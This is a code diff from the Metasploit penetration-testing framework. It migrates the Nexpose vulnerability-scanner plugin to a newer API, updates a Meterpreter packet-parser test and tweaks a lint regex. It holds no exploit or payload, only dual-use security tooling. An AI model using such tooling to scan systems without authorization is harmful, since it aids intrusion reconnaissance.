@@ -481,33 +495,24 @@ class Plugin::Nexpose < Msf::Plugin
         msfid = Time.now.to_i
 
         # Create a temporary site
-        site = Nexpose::Site.new(@nsc)
-        site.setSiteConfig("Metasploit-#{msfid}", "Autocreated by the Metasploit Framework")
-        queue.each do |ip|
-          site.site_config.addHost(Nexpose::IPRange.new(ip))
-        end
-        site.site_config._set_scanConfig(Nexpose::ScanConfig.new(-1, "tmp", opt_template))
-        opt_credentials.each do |c|
-          site.site_config.addCredentials(c)
-        end
-        site.saveSite()
+        site = Nexpose::Site.new(nil, opt_template)
+        site.name = "Metasploit-#{msfid}"
+        site.description = "Autocreated by the Metasploit Framework"
+        site.included_addresses = queue
+        site.site_credentials = opt_credentials
+        site.save(@nsc)
 
-        print_status(" >> Created temporary site ##{site.site_id}") if opt_verbose
+        print_status(" >> Created temporary site ##{site.id}") if opt_verbose
 
         report_formats = ["raw-xml-v2", "ns-xml"]
         report_format  = report_formats.shift
 
-        report = Nexpose::ReportConfig.new(@nsc)
-        report.set_name("Metasploit Export #{msfid}")
-        report.set_template_id(opt_template)
-
-        report.addFilter("SiteFilter", site.site_id)
-        report.set_generate_after_scan(1)
-        report.set_storeOnServer(1)
+        report = Nexpose::ReportConfig.build(@nsc, site.id, site.name, opt_template, report_format, true)
+        report.delivery = Nexpose::Delivery.new(true)
 
         begin
-          report.set_format(report_format)
-          report.saveReport()
+          report.format = report_format
+          report.save(@nsc, true)
         rescue ::Exception => e
         report_format = report_formats.shift
           if report_format
@@ -516,18 +521,19 @@ class Plugin::Nexpose < Msf::Plugin
           raise e
         end
 
-        print_status(" >> Created temporary report configuration ##{report.config_id}") if opt_verbose
+        print_status(" >> Created temporary report configuration ##{report.id}") if opt_verbose
 
         # Run the scan
         begin
-          res  = site.scanSite()
+          res = site.scan(@nsc)
         rescue Nexpose::APIError => e
           nexpose_error_message = e.message
           nexpose_error_message.gsub!(/NexposeAPI: Action failed: /, '')
           print_error "#{nexpose_error_message}"
           return
         end
-        sid = res[:scan_id]
+
+        sid = res.id
 
         print_status(" >> Scan has been launched with ID ##{sid}") if opt_verbose
 
@@ -536,8 +542,8 @@ class Plugin::Nexpose < Msf::Plugin
         prev = nil
         while(true)
           info = @nsc.scan_statistics(sid)
-          break if info[:summary]['status'] != "running"
-          stat = "Found #{info[:nodes]['live']} devices and #{info[:nodes]['dead']} unresponsive"
+          break if info.status != "running"
+          stat = "Found #{info.nodes.live} devices and #{info.nodes.dead} unresponsive"
           if(stat != prev)
             print_status(" >> #{stat}") if opt_verbose
           end
@@ -548,18 +554,19 @@ class Plugin::Nexpose < Msf::Plugin
         rescue ::Interrupt
           rep = false
           print_status(" >> Terminating scan ID ##{sid} due to console interupt") if opt_verbose
-          @nsc.scan_stop(sid)
+          @nsc.stop_scan(sid)
           break
         end
 
         # Wait for the automatic report generation to complete
         if(rep)
           print_status(" >> Waiting on the report to generate...") if opt_verbose
-          url = nil
-          while(! url)
-            url = @nsc.report_last(report.config_id)
+          last_report = nil
+          while(! last_report)
+            last_report = @nsc.last_report(report.id)
             select(nil, nil, nil, 1.0)
           end
+          url = last_report.uri
 
           print_status(" >> Downloading the report data from Nexpose...") if opt_verbose
           data = @nsc.download(url)
@@ -575,8 +582,18 @@ class Plugin::Nexpose < Msf::Plugin
         end
 
         if ! opt_preserve
+          # Make sure the scan has finished clean up before attempting to delete the site
+          while (true)
+            info = @nsc.scan_statistics(sid)
+            break if info.status == 'stopped' || info.status == 'finished'
+            select(nil, nil, nil, 5.0)
+          end
           print_status(" >> Deleting the temporary site and report...") if opt_verbose
-          @nsc.site_delete(site.site_id)
+          begin
+            @nsc.delete_site(site.id)
+          rescue ::Nexpose::APIError => e
+            print_status(" >> Deletion of temporary site and report failed: #{e.inspect}")
+          end
         end
       end
 
@@ -674,3 +691,15 @@ class Plugin::Nexpose < Msf::Plugin
   end
 end
 end
+
+module Nexpose
+  class IPRange
+    def to_json
+      if @to.present?
+        "#{@from} - #{@to}".to_json
+      else
+        @from.to_json
+      end
+    end
+  end
+end
diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
index 1497ebaa9e..22f38ffc5f 100644
--- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
+++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
@@ -26,11 +26,12 @@ RSpec.describe Rex::Post::Meterpreter::PacketParser do
 
   it "should parse valid raw data into a packet object" do
     while @raw.length >0
-      parsed_packet = parser.recv(@sock)
+      parsed_packet, in_progress = parser.recv(@sock)
     end
     expect(parsed_packet).to be_a Rex::Post::Meterpreter::Packet
     expect(parsed_packet.type).to eq Rex::Post::Meterpreter::PACKET_TYPE_REQUEST
     expect(parsed_packet.method?("test_method")).to eq true
+    expect(in_progress).to eq false
   end
 
 end
diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index f61892baa2..1a1dd31912 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -618,7 +618,7 @@ class Msftidy
   end
 
   def check_vars_get
-    test = @source.scan(/send_request_cgi\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im)
+    test = @source.scan(/send_request_cgi\s*\(?\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im)
     unless test.empty?
       test.each { |item|
         info("Please use vars_get in send_request_cgi: #{item}")